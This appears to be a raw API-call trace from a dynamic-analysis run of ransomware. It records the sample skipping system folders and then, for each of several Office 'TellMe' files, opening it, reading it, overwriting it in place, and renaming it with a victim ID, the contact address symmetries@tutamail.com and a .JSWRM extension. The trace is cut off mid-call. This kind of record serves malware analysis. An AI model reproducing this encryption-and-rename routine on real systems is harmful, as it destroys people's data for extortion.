lstrcmpiW (lpString1="TellMeExcel.nrr", lpString2="windows") returned -1 [0121.523] lstrcmpiW (lpString1="TellMeExcel.nrr", lpString2="recovery") returned 1 [0121.523] lstrcmpiW (lpString1="TellMeExcel.nrr", lpString2="perflogs") returned 1 [0121.523] lstrcmpiW (lpString1="TellMeExcel.nrr", lpString2="documents and settings") returned 1 [0121.523] lstrcmpiW (lpString1="TellMeExcel.nrr", lpString2="$RECYCLE.BIN") returned 1 [0121.523] lstrcmpiW (lpString1="TellMeExcel.nrr", lpString2="system volume information") returned 1 [0121.523] lstrcmpiW (lpString1="TellMeExcel.nrr", lpString2="msocache") returned 1 [0121.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0121.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeExcel.nrr", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeExcel.nrr", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeExcel.nrr", lpUsedDefaultChar=0x0) returned 15 [0121.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0121.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0121.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeExcel.nrr", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeExcel.nrr", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeExcel.nrr", lpUsedDefaultChar=0x0) returned 15 [0121.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0121.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0121.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0121.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0121.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeExcel.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeexcel.nrr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.524] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=385016) returned 1 [0121.524] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0121.524] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0121.536] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.536] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0121.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.537] CloseHandle (hObject=0x238) returned 1 [0121.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0121.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0121.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0121.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0121.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0121.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0121.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.537] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeExcel.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeexcel.nrr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeExcel.nrr.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeexcel.nrr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0121.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0121.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0121.538] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaebc65e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaebc65e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaebc65e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f9d0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TellMeOneNote.nrr", cAlternateFileName="TELLME~1.NRR")) returned 1 [0121.538] lstrcmpiW (lpString1="TellMeOneNote.nrr", lpString2=".") returned 1 [0121.538] lstrcmpiW (lpString1="TellMeOneNote.nrr", lpString2="..") returned 1 [0121.538] lstrcmpiW (lpString1="TellMeOneNote.nrr", lpString2="...") returned 1 [0121.538] lstrcmpiW (lpString1="TellMeOneNote.nrr", lpString2="windows") returned -1 [0121.538] lstrcmpiW (lpString1="TellMeOneNote.nrr", lpString2="recovery") returned 1 [0121.538] lstrcmpiW (lpString1="TellMeOneNote.nrr", lpString2="perflogs") returned 1 [0121.538] lstrcmpiW (lpString1="TellMeOneNote.nrr", lpString2="documents and settings") returned 1 [0121.538] lstrcmpiW (lpString1="TellMeOneNote.nrr", lpString2="$RECYCLE.BIN") returned 1 [0121.538] lstrcmpiW (lpString1="TellMeOneNote.nrr", lpString2="system volume information") returned 1 [0121.539] lstrcmpiW (lpString1="TellMeOneNote.nrr", lpString2="msocache") returned 1 [0121.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOneNote.nrr", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0121.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOneNote.nrr", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeOneNote.nrr", lpUsedDefaultChar=0x0) returned 17 [0121.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOneNote.nrr", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0121.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOneNote.nrr", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeOneNote.nrr", lpUsedDefaultChar=0x0) returned 17 [0121.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0121.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0121.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0121.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOneNote.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeonenote.nrr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.540] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=129488) returned 1 [0121.540] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f9d0) returned 0x24e1d8 [0121.540] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1f9d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x1f9d0, lpOverlapped=0x0) returned 1 [0121.585] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.585] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1f9d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x1f9d0, lpOverlapped=0x0) returned 1 [0121.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.587] CloseHandle (hObject=0x238) returned 1 [0121.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0121.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0121.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0121.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0121.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0121.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0121.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.587] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOneNote.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeonenote.nrr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOneNote.nrr.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeonenote.nrr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0121.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0121.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0121.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0121.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0121.589] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaebc65e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaebc65e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaebc65e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30430, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TellMeOutlook.nrr", cAlternateFileName="TE1C01~1.NRR")) returned 1 [0121.589] lstrcmpiW (lpString1="TellMeOutlook.nrr", lpString2=".") returned 1 [0121.589] lstrcmpiW (lpString1="TellMeOutlook.nrr", lpString2="..") returned 1 [0121.589] lstrcmpiW (lpString1="TellMeOutlook.nrr", lpString2="...") returned 1 [0121.589] lstrcmpiW (lpString1="TellMeOutlook.nrr", lpString2="windows") returned -1 [0121.589] lstrcmpiW (lpString1="TellMeOutlook.nrr", lpString2="recovery") returned 1 [0121.589] lstrcmpiW (lpString1="TellMeOutlook.nrr", lpString2="perflogs") returned 1 [0121.589] lstrcmpiW (lpString1="TellMeOutlook.nrr", lpString2="documents and settings") returned 1 [0121.589] lstrcmpiW (lpString1="TellMeOutlook.nrr", lpString2="$RECYCLE.BIN") returned 1 [0121.589] lstrcmpiW (lpString1="TellMeOutlook.nrr", lpString2="system volume information") returned 1 [0121.589] lstrcmpiW (lpString1="TellMeOutlook.nrr", lpString2="msocache") returned 1 [0121.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlook.nrr", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0121.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlook.nrr", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeOutlook.nrr", lpUsedDefaultChar=0x0) returned 17 [0121.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlook.nrr", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0121.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlook.nrr", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeOutlook.nrr", lpUsedDefaultChar=0x0) returned 17 [0121.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0121.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0121.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0121.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlook.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlook.nrr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.591] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=197680) returned 1 [0121.591] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0121.591] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0121.605] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.605] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0121.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.605] CloseHandle (hObject=0x238) returned 1 [0121.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0121.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0121.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0121.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0121.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0121.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0121.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.606] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlook.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlook.nrr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeOutlook.nrr.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeoutlook.nrr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0121.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0121.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0121.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0121.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0121.607] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaebc65e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaebc65e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaebc65e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3d9c4, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TellMeOutlookAddr.nrr", cAlternateFileName="TELLME~3.NRR")) returned 1 [0121.607] lstrcmpiW (lpString1="TellMeOutlookAddr.nrr", lpString2=".") returned 1 [0121.607] lstrcmpiW (lpString1="TellMeOutlookAddr.nrr", lpString2="..") returned 1 [0121.607] lstrcmpiW (lpString1="TellMeOutlookAddr.nrr", lpString2="...") returned 1 [0121.607] lstrcmpiW (lpString1="TellMeOutlookAddr.nrr", lpString2="windows") returned -1 [0121.607] lstrcmpiW (lpString1="TellMeOutlookAddr.nrr", lpString2="recovery") returned 1 [0121.607] lstrcmpiW (lpString1="TellMeOutlookAddr.nrr", lpString2="perflogs") returned 1 [0121.607] lstrcmpiW (lpString1="TellMeOutlookAddr.nrr", lpString2="documents and settings") returned 1 [0121.607] lstrcmpiW (lpString1="TellMeOutlookAddr.nrr", lpString2="$RECYCLE.BIN") returned 1 [0121.607] lstrcmpiW (lpString1="TellMeOutlookAddr.nrr", lpString2="system volume information") returned 1 [0121.608] lstrcmpiW (lpString1="TellMeOutlookAddr.nrr", lpString2="msocache") returned 1 [0121.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeOutlookAddr.nrr", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | 